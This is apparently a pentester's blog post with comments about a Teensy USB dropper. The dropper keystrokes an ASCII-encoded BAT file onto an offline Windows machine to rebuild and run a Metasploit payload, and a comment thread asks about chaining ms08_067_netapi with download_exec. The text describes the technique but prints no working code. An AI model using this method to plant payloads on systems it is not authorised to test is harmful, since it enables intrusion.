I don’t know if anybody would find this usable, but I thought it is a nice exercise and it was fun coding it. In one of the previous posts I was mentioning a restrictive scenario much like this …Pentesters need to drop files on targets. If a box is not connected to the Internet, and doesn’t accept removable storage, they need to come up with some tricks.Inputting the file via the keyboard is an option, but typing several millions of bytes is not. This needs automation.
So I’ve designed a Teensy dropper that uses pure ASCII to drop a single BAT file to the target and executes it. So far I only have the BAT generator which works well in my test Win7 environment. It should be trivial to convert the generated BAT to a C code and program Teensy with it.
The BAT generator uses code and encoding taken from Terry Newtons website Binary2batch
Damn the autoconversion of ASCII special char$ !!!
You need Dosbox for this to work, as the shellcode uses the 16bit DOS encoder to encode the executable into ASCII characters. The shellscript is rather rough and has a hardcoded string like the original executable name (a.exe) I could not come up with a bash variable string to parse into Dosbox command.
The first part is a CM3 encoded decoder decbin.com which would decode the metasploit payload exe. The second part is also CM3 encoded encoder which encodes the metasplot payload exe.
So what you need is the actual Metasploit payload EXE, place it into a working dir where this script would reside and rename it to a.exe (or modify the script to your needs)
I find it incredible how it is possible to “abuse” the 16bit binary emulation on modern 32bit Windows. Its a real jungle and monkeys like jungle …..
and what’s Teensy indeed ?
I will post the Teensy C code generator later on. Or you can create your own using couple of echo and sed commands on the generated BAT file.
astrobaby hablo en español te puedo hacer algunas preguntas?
What do you want to know ?
How I cand transform Metasploit “ms08_067_netapi” and “download_exec” into one linux standalone executable(without metasploit installed) ?
You still need metasploit on the attacker box (or a stripped down version containing only ms08_067_netapi exploit). What I would do is create a bash script that would autohandle all tasks needed to load ms08_067_netapi exploit. There are many examples on my blog how it is done.